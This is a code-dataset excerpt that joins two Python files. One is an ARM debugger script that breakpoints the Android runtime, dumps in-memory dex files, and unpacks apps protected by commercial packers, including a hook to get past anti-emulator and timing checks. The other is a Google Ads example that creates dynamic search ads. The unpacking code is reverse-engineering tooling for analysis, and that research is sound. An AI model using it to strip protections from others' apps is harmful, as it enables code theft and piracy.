| 0.653282
|
65b43d15098e06b351483f957d9ece9b332a3061
| 25,367
|
py
|
Python
|
ds5-scripts/aosp_6_0/arm/DexFile.py
|
rewhy/happer
|
3b48894e2d91f150f1aee0ce75291b9ca2a29bbe
|
[
"Apache-2.0"
] | 32
|
2021-04-08T05:39:51.000Z
|
2022-03-31T03:49:35.000Z
|
ds5-scripts/aosp_6_0/arm/DexFile.py
|
rewhy/happer
|
3b48894e2d91f150f1aee0ce75291b9ca2a29bbe
|
[
"Apache-2.0"
] | 2
|
2021-04-14T08:31:30.000Z
|
2021-08-29T19:12:09.000Z
|
ds5-scripts/aosp_6_0/arm/DexFile.py
|
rewhy/happer
|
3b48894e2d91f150f1aee0ce75291b9ca2a29bbe
|
[
"Apache-2.0"
] | 3
|
2021-06-08T08:52:56.000Z
|
2021-06-23T17:28:51.000Z
|
# DexFile.py is used to dump the dex file when the "DexFile::<init>" method is invoked in 32-bit mode.
import gc
import os
import sys
from arm_ds.debugger_v1 import Debugger
from arm_ds.debugger_v1 import DebugException
import config
import memory
import mmu
from DexParser import header_item, class_data_item
from OfflineDexParser import Dex
# obtain current execution state
debugger = Debugger()
execution_state = debugger.getCurrentExecutionContext()
# define the analyzing configuration related to the DexFile loading
def dex_setup(pid):
# define the breakpoints
# DexFile related
brk_DexFile_cmd = "hbreak" + " " + str(hex(config.brk_DexFile)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# brk_DexFile_cmd = "hbreak" + " " + str(hex(config.brk_DexFile)).replace('L', '')
execution_state.executeDSCommand(brk_DexFile_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
# DexFile related
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_DexFile:
bs_DexFile_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.DexFile_script)
execution_state.executeDSCommand(bs_DexFile_cmd)
brk_object.enable()
# define the analyzing configuration related to the Java execution flow
def je_setup(pid):
# define the breakpoints
# execution flow related
brk_ArtQuickToInterpreterBridge_cmd = "hbreak" + " " + str(hex(config.brk_ArtQuickToInterpreterBridge)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_ArtQuickToInterpreterBridge_cmd)
# brk_ArtInterpreterToInterpreterBridge_cmd = "hbreak" + " " + str(hex(config.brk_ArtInterpreterToInterpreterBridge)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_ArtInterpreterToInterpreterBridge_cmd)
# brk_ArtInterpreterToCompiledCodeBridge_cmd = "hbreak" + " " + str(hex(config.brk_ArtInterpreterToCompiledCodeBridge)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_ArtInterpreterToCompiledCodeBridge_cmd)
brk_DoCall_cmd = "hbreak" + " " + str(hex(config.brk_DoCall)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_DoCall_cmd)
brk_ArtQuickGenericJniTrampoline_cmd = "hbreak" + " " + str(hex(config.brk_ArtQuickGenericJniTrampoline)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_ArtQuickGenericJniTrampoline_cmd)
brk_Invoke_cmd = "hbreak" + " " + str(hex(config.brk_Invoke)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_Invoke_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
# execution flow related
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_ArtQuickToInterpreterBridge:
bs_ArtQuickToInterpreterBridge_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.ArtQuickToInterpreterBridge_script)
execution_state.executeDSCommand(bs_ArtQuickToInterpreterBridge_cmd)
brk_object.enable()
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_ArtInterpreterToInterpreterBridge:
# bs_ArtInterpreterToInterpreterBridge_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.ArtInterpreterToInterpreterBridge_script)
# execution_state.executeDSCommand(bs_ArtInterpreterToInterpreterBridge_cmd)
# brk_object.enable()
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_ArtInterpreterToCompiledCodeBridge:
# bs_ArtInterpreterToCompiledCodeBridge_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.ArtInterpreterToCompiledCodeBridge_script)
# execution_state.executeDSCommand(bs_ArtInterpreterToCompiledCodeBridge_cmd)
# brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_DoCall:
bs_DoCall_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.DoCall_script)
execution_state.executeDSCommand(bs_DoCall_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_ArtQuickGenericJniTrampoline:
bs_ArtQuickGenericJniTrampoline_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.ArtQuickGenericJniTrampoline_script)
execution_state.executeDSCommand(bs_ArtQuickGenericJniTrampoline_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_Invoke:
bs_Invoke_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.Invoke_script)
execution_state.executeDSCommand(bs_Invoke_cmd)
brk_object.enable()
brk_object.ignore(0)
# define the analyzing configuration related to the Native execution flow
def ne_setup(pid):
# define the breakpoints
# JNI_onLoad related
brk_LoadNativeLibrary_cmd = "hbreak" + " " + str(hex(config.brk_LoadNativeLibrary)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_LoadNativeLibrary_cmd)
brk_JNI_onLoad_cmd = "hbreak" + " " + str(hex(config.brk_JNI_onLoad)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_JNI_onLoad_cmd)
# execution flow related
brk_ArtQuickGenericJniTrampoline_cmd = "hbreak" + " " + str(hex(config.brk_ArtQuickGenericJniTrampoline)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_ArtQuickGenericJniTrampoline_cmd)
brk_ArtQuickGenericJniEndTrampoline_cmd = "hbreak" + " " + str(hex(config.brk_ArtQuickGenericJniEndTrampoline)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_ArtQuickGenericJniEndTrampoline_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
# JNI_onLoad related
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_LoadNativeLibrary:
bs_LoadNativeLibrary_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.LoadNativeLibrary_script)
execution_state.executeDSCommand(bs_LoadNativeLibrary_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_JNI_onLoad:
bs_JNI_onLoad_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.JNI_onLoad_script)
execution_state.executeDSCommand(bs_JNI_onLoad_cmd)
brk_object.enable()
# execution flow related
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_ArtQuickGenericJniTrampoline:
bs_ArtQuickGenericJniTrampoline_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.ArtQuickGenericJniTrampoline_script)
execution_state.executeDSCommand(bs_ArtQuickGenericJniTrampoline_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_ArtQuickGenericJniEndTrampoline:
bs_ArtQuickGenericJniEndTrampoline_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.ArtQuickGenericJniEndTrampoline_script)
execution_state.executeDSCommand(bs_ArtQuickGenericJniEndTrampoline_cmd)
brk_object.enable()
# define the analyzing configuration related to the Art-Runtime execution flow
def art_setup(pid):
# define the breakpoints
# execution flow related
brk_LoadClassMembers_cmd = "hbreak" + " " + str(hex(config.brk_LoadClassMembers)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_LoadClassMembers_cmd)
brk_LoadMethod_cmd = "hbreak" + " " + str(hex(config.brk_LoadMethod)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_LoadMethod_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
# execution flow related
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_LoadClassMembers:
bs_LoadClassMembers_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.LoadClassMembers_script)
execution_state.executeDSCommand(bs_LoadClassMembers_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_LoadMethod:
bs_LoadMethod_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.LoadMethod_script)
execution_state.executeDSCommand(bs_LoadMethod_cmd)
brk_object.enable()
# brk_object.ignore(13)
# define the analyzing configuration related to the in-memory dex file modification
def dex_modification_setup(pid):
# define the breakpoints
# brk_DexModification_cmd = "hbreak" + " " + str(hex(config.brk_JNI_onLoad)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
brk_DexModification_cmd = "hbreak" + " " + str(hex(config.brk_ArtQuickGenericJniEndTrampoline)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_DexModification_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_JNI_onLoad:
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_ArtQuickGenericJniEndTrampoline:
bs_DexModification_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.DexModification_script)
execution_state.executeDSCommand(bs_DexModification_cmd)
brk_object.enable()
# define the analyzing configuration related to the Class-object modification
def class_modification_setup(pid):
# define the breakpoints
brk_ClassModification_cmd = "hbreak" + " " + str(hex(config.brk_DoCall)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_ClassModification_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_DoCall:
bs_ClassModification_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.ClassModification_script)
execution_state.executeDSCommand(bs_ClassModification_cmd)
brk_object.enable()
# define the analyzing configuration related to the anti-time-checking
def anti_time_checking_setup(pid):
# define the breakpoints
# brk_clock_gettime_cmd = "hbreak" + " " + str(hex(config.brk_clock_gettime)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_clock_gettime_cmd)
brk_gettimeofday_cmd = "hbreak" + " " + str(hex(config.brk_gettimeofday)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_gettimeofday_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_clock_gettime:
# bs_clock_gettime_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.clock_gettime_script)
# execution_state.executeDSCommand(bs_clock_gettime_cmd)
# brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_gettimeofday:
bs_gettimeofday_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.gettimeofday_script)
execution_state.executeDSCommand(bs_gettimeofday_cmd)
brk_object.enable()
def anti_emulator(pid):
# define the breakpoints
brk_Invoke_cmd = "hbreak" + " " + str(hex(config.brk_Invoke)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_Invoke_cmd)
brk_strcmp_cmd = "hbreak" + " " + str(hex(config.brk_strcmp)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_strcmp_cmd)
brk_strncmp_cmd = "hbreak" + " " + str(hex(config.brk_strncmp)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_strncmp_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_Invoke:
bs_Invoke_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.Invoke_script)
execution_state.executeDSCommand(bs_Invoke_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_strcmp:
bs_strcmp_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.strcmp_script)
execution_state.executeDSCommand(bs_strcmp_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_strncmp:
bs_strncmp_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.strncmp_script)
execution_state.executeDSCommand(bs_strncmp_cmd)
brk_object.enable()
def unpack_ali_2016(pid):
dex_modification_setup(pid)
def unpack_baidu_2016(file_path, dex_file_base, dex_file_size):
dex = Dex.Dex(file_path)
for class_def_item in dex.class_defs.class_def_items:
class_data_off = class_def_item.class_data_off
if (class_data_off > dex_file_size) or (class_data_off < 0):
# parse class_data_item
static_fields_size_off = 0x0
static_fields_size, length_static_fields_size = class_data_item.get_static_fields_size(dex_file_base, class_data_off, static_fields_size_off)
config.log_print("[DexFile] [class_data_item] static_fields_size = %#x" % static_fields_size)
instance_fields_size_off = static_fields_size_off + length_static_fields_size
instance_fields_size, length_instance_fields_size = class_data_item.get_instance_fields_size(dex_file_base, class_data_off, instance_fields_size_off)
config.log_print("[DexFile] [class_data_item] instance_fields_size = %#x" % instance_fields_size)
direct_methods_size_off = instance_fields_size_off + length_instance_fields_size
direct_methods_size, length_direct_methods_size = class_data_item.get_direct_methods_size(dex_file_base, class_data_off, direct_methods_size_off)
config.log_print("[DexFile] [class_data_item] direct_methods_size = %#x" % direct_methods_size)
virtual_methods_size_off = direct_methods_size_off + length_direct_methods_size
virtual_methods_size, length_virtual_methods_size = class_data_item.get_virtual_methods_size(dex_file_base, class_data_off, virtual_methods_size_off)
config.log_print("[DexFile] [class_data_item] virtual_methods_size = %#x" % virtual_methods_size)
static_fields_off = virtual_methods_size_off + length_virtual_methods_size
static_fields, length_static_fields = class_data_item.get_static_fields(dex_file_base, class_data_off, static_fields_off, static_fields_size)
for idx in range(static_fields_size):
config.log_print("[DexFile] [class_data_item] static_fields[%d].field_idx_diff = %#x" % (idx, static_fields[idx][0]))
config.log_print("[DexFile] [class_data_item] static_fields[%d].access_flags = %0#10x" % (idx, static_fields[idx][1]))
instance_fields_off = static_fields_off + length_static_fields
instance_fields, length_instance_fields = class_data_item.get_instance_fields(dex_file_base, class_data_off, instance_fields_off, instance_fields_size)
for idx in range(instance_fields_size):
config.log_print("[DexFile] [class_data_item] instance_fields[%d].field_idx_diff = %#x" % (idx, instance_fields[idx][0]))
config.log_print("[DexFile] [class_data_item] instance_fields[%d].access_flags = %0#10x" % (idx, instance_fields[idx][1]))
direct_methods_off = instance_fields_off + length_instance_fields
direct_methods, length_direct_methods = class_data_item.get_direct_methods(dex_file_base, class_data_off, direct_methods_off, direct_methods_size)
for idx in range(direct_methods_size):
config.log_print("[DexFile] [class_data_item] direct_methods[%d].method_idx_diff = %#x" % (idx, direct_methods[idx][0]))
config.log_print("[DexFile] [class_data_item] direct_methods[%d].access_flags = %0#10x" % (idx, direct_methods[idx][1]))
config.log_print("[DexFile] [class_data_item] direct_methods[%d].code_off = %0#10x" % (idx, direct_methods[idx][2]))
virtual_methods_off = direct_methods_off + length_direct_methods
virtual_methods, length_virtual_methods = class_data_item.get_virtual_methods(dex_file_base, class_data_off, virtual_methods_off, virtual_methods_size)
for idx in range(virtual_methods_size):
config.log_print("[DexFile] [class_data_item] virtual_methods[%d].method_idx_diff = %#x" % (idx, virtual_methods[idx][0]))
config.log_print("[DexFile] [class_data_item] virtual_methods[%d].access_flags = %0#10x" % (idx, virtual_methods[idx][1]))
config.log_print("[DexFile] [class_data_item] virtual_methods[%d].code_off = %0#10x" % (idx, virtual_methods[idx][2]))
class_data_size = virtual_methods_off + length_virtual_methods
file_path = os.path.join(config.workspace, config.dex_directory, "class_data_item_%0#10x.bin" % (class_data_off if class_data_off > 0 else (0xffffffff + class_data_off)))
if not os.path.exists(file_path):
file_format = "binary"
file_vtl_start_address = (dex_file_base + class_data_off) & 0xffffffff
file_vtl_end_address = ((dex_file_base + class_data_off) & 0xffffffff) + class_data_size - 0x1
memory.dump(file_path, file_format, file_vtl_start_address, file_vtl_end_address)
def unpack_bangcle_2016(pid):
pass
def unpack_ijiami_2016(pid):
art_setup(pid)
anti_time_checking_setup(pid)
def unpack_qihoo_2016(pid):
pass
# set the analyzing environment
def setup(pid):
# if we re-enter the configuration process, we will perform some verifications
if execution_state.getBreakpointService().getBreakpointCount() > 1:
# we can infer that the base dex file has been loaded for more than once
# further more, in normal cases, the pid for the DexFile breakpoint should remain the same
info_breakpoint_cmd = "info breakpoints"
breakpoint_info_list = execution_state.executeDSCommand(info_breakpoint_cmd).split('\n')
for idx in range(len(breakpoint_info_list)):
current_info = breakpoint_info_list[idx]
if ("%0#10x" % config.brk_DexFile) in current_info:
current_pid_info = breakpoint_info_list[idx + 2]
if current_pid_info.strip().startswith("Only for Context ID "):
previous_pid_string = current_pid_info.strip().replace("Only for Context ID ", "").replace(",", "")
previous_pid = int(previous_pid_string)
# in normal cases, we do nothing
if previous_pid == pid:
return
break
# remove all current breakpoints
try:
debugger.removeAllBreakpoints()
except DebugException:
rm_brks = []
for breakpoint_index in range(0, execution_state.getBreakpointService().getBreakpointCount()):
breakpoint_object = execution_state.getBreakpointService().getBreakpoint(breakpoint_index)
if breakpoint_object.isHardware() or ((int(breakpoint_object.getAddresses()[0]) & 0xffffffff) == config.brk_DexFile):
rm_brks.append(breakpoint_object)
for brk_obj in rm_brks:
brk_obj.remove()
# combination of different analyzing configurations
dex_setup(pid)
# je_setup(pid)
# ne_setup(pid)
# art_setup(pid)
# class_modification_setup(pid)
# anti_time_checking_setup(pid)
# anti_emulator(pid)
# unpack_ali_2016(pid)
# unpack_bangcle_2016(pid)
unpack_ijiami_2016(pid)
# unpack_qihoo_2016(pid)
def retrieve_string_value(string_ptr):
length_val = memory.readMemory32(string_ptr + config.offset_string_length)
reference_ptr = memory.readMemory32(string_ptr + config.offset_string_reference)
char_array = memory.retrieve_char_array(reference_ptr)
return char_array
def cleanup():
if mmu.page_table is not None:
del mmu.page_table
gc.collect()
def init_DexFile():
# get the pointer that refers to the DexFile structure
dex_file_ptr = int(execution_state.getRegisterService().getValue("R0")) & 0xffffffff
# read the "begin_" field
dex_file_begin_val = int(execution_state.getRegisterService().getValue("R1")) & 0xffffffff
if config.debug:
print "[DexFile] begin_ = %0#10x" % dex_file_begin_val
# read the "size_" field
dex_file_size_val = int(execution_state.getRegisterService().getValue("R2")) & 0xffffffff
if config.debug:
print "[DexFile] size_ = %#x" % dex_file_size_val
# read the "location_" field
dex_file_location_ptr = int(execution_state.getRegisterService().getValue("R3")) & 0xffffffff
# retrieve the value of the std::string structure
dex_file_location_string_val = retrieve_string_value(dex_file_location_ptr)
if config.debug:
print "[DexFile] location_ = %s" % dex_file_location_string_val
# if config.package_filter(dex_file_location_string_val) and dex_file_location_string_val.endswith("base.apk"):
if config.package_filter(dex_file_location_string_val):
pid_val = int(execution_state.getVariableService().readValue("$AARCH64::$System::$Memory::$CONTEXTIDR_EL1.PROCID")) & 0xffffffff
if config.debug:
print "[DexFile] pid = %#x" % pid_val
config.log_print("[DexFile] pid = %#x" % pid_val)
setup(pid_val)
# we only focus on the DexFile whose location is suspicious
if not config.package_filter(dex_file_location_string_val):
# continue the execution of the target application
execution_state.getExecutionService().resume()
cleanup()
return
# # parse the header_item of the dex file
# header_item.parse_header_item(dex_file_begin_val)
# # calculate the "size_" value from the "map_off" field of the header_item
# dex_file_size_val_calc = 0x0
# if config.package_filter(dex_file_location_string_val):
# map_off = header_item.get_map_off(dex_file_begin_val)
# map_list_ptr = dex_file_begin_val + map_off
# map_list_size_val = memory.readMemory32(map_list_ptr + 0x0)
# dex_file_size_val_calc = map_off + (0x4) + map_list_size_val * (0x2 + 0x2 + 0x4 + 0x4)
# config.log_print("[DexFile] begin_ = %0#10x, size_ = %#x (inferring size = %#x), location_ = %s" % (dex_file_begin_val, dex_file_size_val, dex_file_size_val_calc, dex_file_location_string_val))
config.log_print("[DexFile] begin_ = %0#10x, size_ = %#x, location_ = %s" % (dex_file_begin_val, dex_file_size_val, dex_file_location_string_val))
config.save_dex_info(dex_file_begin_val, dex_file_size_val, dex_file_location_string_val.split("/")[-1])
# dump the in-memory DexFile
file_path = os.path.join(config.workspace, config.dex_directory, dex_file_location_string_val.split("/")[-1])
file_format = "binary"
file_vtl_start_address = dex_file_begin_val
file_vtl_end_address = dex_file_begin_val + dex_file_size_val - 0x1
file_path = memory.dump(file_path, file_format, file_vtl_start_address, file_vtl_end_address)
# unpack_baidu_2016(file_path, dex_file_begin_val, dex_file_size_val)
# continue the execution of the target application
execution_state.getExecutionService().resume()
cleanup()
return
if __name__ == '__main__':
init_DexFile()
sys.exit()
| 58.584296
| 210
| 0.745772
|
1009a857c4f86a8bf8ea56d55ed9b106b3ced138
| 11,479
|
py
|
Python
|
examples/advanced_operations/add_dynamic_search_ads.py
|
andy0937/google-ads-python
|
cb5da7f4a75076828d1fc3524b08cc167670435a
|
[
"Apache-2.0"
] | 1
|
2019-11-30T23:42:39.000Z
|
2019-11-30T23:42:39.000Z
|
examples/advanced_operations/add_dynamic_search_ads.py
|
andy0937/google-ads-python
|
cb5da7f4a75076828d1fc3524b08cc167670435a
|
[
"Apache-2.0"
] | null | null | null |
examples/advanced_operations/add_dynamic_search_ads.py
|
andy0937/google-ads-python
|
cb5da7f4a75076828d1fc3524b08cc167670435a
|
[
"Apache-2.0"
] | 1
|
2020-09-30T17:04:06.000Z
|
2020-09-30T17:04:06.000Z
|
#!/usr/bin/env python
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example adds a new dynamic search ad (DSA).
It also creates a webpage targeting criteria for the DSA.
"""
import argparse
import sys
from uuid import uuid4
from datetime import datetime, timedelta
from google.ads.google_ads.client import GoogleAdsClient
from google.ads.google_ads.errors import GoogleAdsException
def main(client, customer_id):
"""The main method that creates all necessary entities for the example.
Args:
client: an initialized GoogleAdsClient instance.
customer_id: a client customer ID str.
"""
try:
budget_resource_name = create_budget(client, customer_id)
campaign_resource_name = create_campaign(client, customer_id,
budget_resource_name)
ad_group_resource_name = create_ad_group(client, customer_id,
campaign_resource_name)
create_expanded_dsa(client, customer_id, ad_group_resource_name)
add_webpage_criterion(client, customer_id, ad_group_resource_name)
except GoogleAdsException as ex:
print(f'Request with ID "{ex.request_id}" failed with status '
f'"{ex.error.code().name}" and includes the following errors:')
for error in ex.failure.errors:
print(f'\tError with message "{error.message}".')
if error.location:
for field_path_element in error.location.field_path_elements:
print(f'\t\tOn field: {field_path_element.field_name}')
sys.exit(1)
def create_budget(client, customer_id):
"""Creates a budget under the given customer ID.
Args:
client: an initialized GoogleAdsClient instance.
customer_id: a client customer ID str.
Returns:
A resource_name str for the newly created Budget.
"""
# Creates a campaign budget operation.
campaign_budget_operation = client.get_type('CampaignBudgetOperation',
version='v3')
# Issues a mutate request to add campaign budgets.
campaign_budget = campaign_budget_operation.create
campaign_budget.name.value = f'Interplanetary Cruise #{uuid4()}'
campaign_budget.amount_micros.value = 50000000
campaign_budget.delivery_method = client.get_type(
'BudgetDeliveryMethodEnum', version='v3').STANDARD
# Retrieve the campaign budget service.
campaign_budget_service = client.get_service('CampaignBudgetService',
version='v3')
# Submit the campaign budget operation to add the campaign budget.
response = campaign_budget_service.mutate_campaign_budgets(
customer_id, [campaign_budget_operation])
resource_name = response.results[0].resource_name
print(f'Created campaign budget with resource_name: "{resource_name}"')
return resource_name
def create_campaign(client, customer_id, budget_resource_name):
"""Creates a Dynamic Search Ad Campaign under the given customer ID.
Args:
client: an initialized GoogleAdsClient instance.
customer_id: a client customer ID str.
budget_resource_name: a resource_name str for a Budget
Returns:
A resource_name str for the newly created Campaign.
"""
# Retrieve a new campaign operation object.
campaign_operation = client.get_type('CampaignOperation', version='v3')
campaign = campaign_operation.create
campaign.name.value = f'Interplanetary Cruise #{uuid4()}'
campaign.advertising_channel_type = client.get_type(
'AdvertisingChannelTypeEnum', version='v3').SEARCH
# Recommendation: Set the campaign to PAUSED when creating it to prevent the
# ads from immediately serving. Set to ENABLED once you've added targeting
# and the ads are ready to serve.
campaign.status = client.get_type('CampaignStatusEnum',
version='v3').PAUSED
campaign.manual_cpc.enhanced_cpc_enabled.value = True
campaign.campaign_budget.value = budget_resource_name
# Required: Enable the campaign for DSAs by setting the campaign's dynamic
# search ads setting domain name and language.
campaign.dynamic_search_ads_setting.domain_name.value = 'example.com'
campaign.dynamic_search_ads_setting.language_code.value = 'en'
# Optional: Sets the start and end dates for the campaign, beginning one day
# from now and ending a month from now.
campaign.start_date.value = datetime.now().strftime('%Y%m%d')
campaign.end_date.value = (
datetime.now() + timedelta(days=365)).strftime('%Y%m%d')
# Retrieve the campaign service.
campaign_service = client.get_service('CampaignService', version='v3')
# Issues a mutate request to add campaign.
response = campaign_service.mutate_campaigns(
customer_id, [campaign_operation])
resource_name = response.results[0].resource_name
print(f'Created campaign with resource_name: "{resource_name}"')
return resource_name
def create_ad_group(client, customer_id, campaign_resource_name):
"""Creates a Dynamic Search Ad Group under the given Campaign.
Args:
client: an initialized GoogleAdsClient instance.
customer_id: a client customer ID str.
campaign_resource_name: a resource_name str for a Campaign.
Returns:
A resource_name str for the newly created Ad Group.
"""
# Retrieve a new ad group operation object.
ad_group_operation = client.get_type('AdGroupOperation', version='v3')
# Create an ad group.
ad_group = ad_group_operation.create
# Required: set the ad group's type to Dynamic Search Ads.
ad_group.type = client.get_type('AdGroupTypeEnum',
version='v3').SEARCH_DYNAMIC_ADS
ad_group.name.value = f'Earth to Mars Cruises {uuid4()}'
ad_group.campaign.value = campaign_resource_name
ad_group.status = client.get_type('AdGroupStatusEnum', version='v3').PAUSED
# Recommended: set a tracking URL template for your ad group if you want to
# use URL tracking software.
ad_group.tracking_url_template.value = (
'http://tracker.example.com/traveltracker/{escapedlpurl}')
# Optional: Set the ad group bid value.
ad_group.cpc_bid_micros.value = 10000000
# Retrieve the ad group service.
ad_group_service = client.get_service('AdGroupService', version='v3')
# Issues a mutate request to add the ad group.
response = ad_group_service.mutate_ad_groups(customer_id,
[ad_group_operation])
resource_name = response.results[0].resource_name
print(f'Created Ad Group with resource_name: "{resource_name}"')
return resource_name
def create_expanded_dsa(client, customer_id, ad_group_resource_name):
"""Creates a dynamic search ad under the given ad group.
Args:
client: an initialized GoogleAdsClient instance.
customer_id: a client customer ID str.
ad_group_resource_name: a resource_name str for an Ad Group.
"""
# Retrieve a new ad group ad operation object.
ad_group_ad_operation = client.get_type('AdGroupAdOperation', version='v3')
# Create and expanded dynamic search ad. This ad will have its headline,
# display URL and final URL auto-generated at serving time according to
# domain name specific information provided by DynamicSearchAdSetting at
# the campaign level.
ad_group_ad = ad_group_ad_operation.create
# Optional: set the ad status.
ad_group_ad.status = client.get_type('AdGroupAdStatusEnum',
version='v3').PAUSED
# Set the ad description.
ad_group_ad.ad.expanded_dynamic_search_ad.description.value = (
'Buy tickets now!')
ad_group_ad.ad_group.value = ad_group_resource_name
# Retrieve the ad group ad service.
ad_group_ad_service = client.get_service('AdGroupAdService', version='v3')
# Submit the ad group ad operation to add the ad group ad.
response = ad_group_ad_service.mutate_ad_group_ads(customer_id,
[ad_group_ad_operation])
resource_name = response.results[0].resource_name
print(f'Created Ad Group Ad with resource_name: "{resource_name}"')
